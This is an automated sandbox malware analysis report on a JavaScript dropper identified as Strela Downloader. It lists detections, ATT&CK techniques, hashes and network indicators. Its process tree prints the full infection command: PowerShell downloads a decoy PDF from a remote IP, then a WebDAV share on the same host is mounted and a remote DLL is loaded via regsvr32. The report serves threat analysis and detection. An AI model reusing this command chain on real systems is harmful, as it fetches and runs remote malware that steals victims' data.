Windows
Analysis Report
2272523722022218526.js
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- wscript.exe (PID: 7364 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\22725 2372202221 8526.js" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 7456 cmdline:
"C:\Window s\System32 \cmd.exe" /c powersh ell.exe -C ommand "In voke-WebRe quest -Out File C:\Us ers\user~1 \AppData\L ocal\Temp\ invoice.pd f http://1 93.143.1.2 05/invoice .php"&&sta rt C:\User s\user~1\A ppData\Loc al\Temp\in voice.pdf& &cmd /c ne t use \\19 3.143.1.20 5@8888\dav wwwroot\&& cmd /c reg svr32 /s \ \193.143.1 .205@8888\ davwwwroot \263232791 26088.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7464 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7504 cmdline:
powershell .exe -Comm and "Invok e-WebReque st -OutFil e C:\Users \user~1\Ap pData\Loca l\Temp\inv oice.pdf h ttp://193. 143.1.205/ invoice.ph p" MD5: 04029E121A0CFA5991749937DD22A1D9) - Acrobat.exe (PID: 7784 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\Acrobat .exe" "C:\ Users\user ~1\AppData \Local\Tem p\invoice. pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) - AcroCEF.exe (PID: 8004 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ba ckgroundco lor=167772 15 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 8184 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --log-seve rity=disab le --user- agent-prod uct="Reade rServices/ 23.6.20320 Chrome/10 5.0.0.0" - -lang=en-U S --log-fi le="C:\Pro gram Files \Adobe\Acr obat DC\Ac robat\acro cef_1\debu g.log" --m ojo-platfo rm-channel -handle=21 00 --field -trial-han dle=1748,i ,168835102 7171491664 8,17976950 3939900852 60,131072 --disable- features=B ackForward Cache,Calc ulateNativ eWinOcclus ion,WinUse BrowserSpe llChecker /prefetch: 8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
- svchost.exe (PID: 8072 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_StrelaDownloader | Yara detected Strela Downloader | Joe Security |
System Summary |
---|
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): |
Source: | Author: Florian Roth (Nextron Systems), Hieu Tran: |
Source: | Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: frack113, Nasreddine Bencherchali: |
Source: | Author: Michael Haag: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: frack113: |
Source: | Author: vburov: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Author: Joe Security: |
Click to jump to signature section
Software Vulnerabilities |
---|
Source: | Argument value : | Go to definition | ||
Source: | Argument value : | Go to definition |
Source: | Child: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Spam, unwanted Advertisements and Ransom Demands |
---|
Source: | File source: |
System Summary |
---|
Source: | COM Object queried: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Initial sample: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Data Obfuscation |
---|
Source: | Anti Malware Scan Interface: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | COM call: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window found: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Last function: | ||
Source: | Last function: |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 32 Scripting | Valid Accounts | 1 Command and Scripting Interpreter | 32 Scripting | 11 Process Injection | 11 Masquerading | OS Credential Dumping | 1 Network Share Discovery | Remote Services | Data from Local System | Data Obfuscation | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 131 Virtualization/Sandbox Evasion | LSASS Memory | 11 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 131 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 122 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
5% | ReversingLabs | Script-JS.Trojan.StrelaStealer | ||
5% | Virustotal | Browse |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
193.143.1.205 | unknown | unknown | 57271 | BITWEB-ASRU | true |
IP |
---|
127.0.0.1 |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1588854 |
Start date and time: | 2025-01-11 06:18:53 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 5m 12s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 19 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | 2272523722022218526.js |
Detection: | MAL |
Classification: | mal100.rans.spyw.expl.evad.winJS@27/60@0/2 |
EGA Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
- Excluded IPs from analysis (whitelisted): 184.28.88.176, 50.16.47.176, 18.213.11.84, 34.237.241.83, 54.224.241.105, 162.159.61.3, 172.64.41.3, 2.23.242.162, 217.20.57.21, 2.16.168.107, 2.16.168.105, 23.209.209.135, 23.200.0.33, 23.200.0.21, 192.168.2.7, 13.107.246.45, 52.149.20.212, 23.41.168.139
- Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, 7.4.8.4.4.3.1.4.0.0.0.0.0.0.0.0.0.0.0.a.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, ctldl.windowsupdate.com, time.windows.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtCreateFile calls found.
- Report size getting too big, too many NtCreateKey calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description |
---|---|---|
00:19:53 | API Interceptor | |
00:19:57 | API Interceptor | |
00:19:57 | API Interceptor | |
02:10:33 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
193.143.1.205 | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
BITWEB-ASRU | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.7067038688987752 |
Encrypted: | false |
SSDEEP: | 1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6Vq0:2JIB/wUKUKQncEmYRTwh0Y |
MD5: | 74D7C98910A311641D005C7AD7FBF32E |
SHA1: | 76D6798978A21BE5461001DDDC24959BB647A335 |
SHA-256: | 4776C7ED4ABC6125DEB0FB177C0E24CACDA9885E157D615E3832A22345EA4A13 |
SHA-512: | 06D85B76D9A8F4C7F2D51E410471A0D3C604739289F86426924A2145589F7B87C5EE13AF92502DF0D8F624A7B5B3A330D0CEB290B2423505026713173A817A92 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.7899981699072612 |
Encrypted: | false |
SSDEEP: | 1536:LSB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+dzV:LazaPvgurTd42UgSii |
MD5: | 210E1A5F9E68B8EE4B1D18C6360A6FA2 |
SHA1: | 4B2E317B174EDADACBC995B054028D7D84153FAA |
SHA-256: | 059AE447B3365F7AB75DA7F25045730A788EDFF65E92A6B8AAA585CCF244ABBA |
SHA-512: | A7EE1625C12BEAF408198F2F2F0300D280E20B1DC901437890006A9F405B43DA039B0F36A5F190EE6D57F5A967EFD3CB282392390A6BB86F383EB742B55849C5 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16384 |
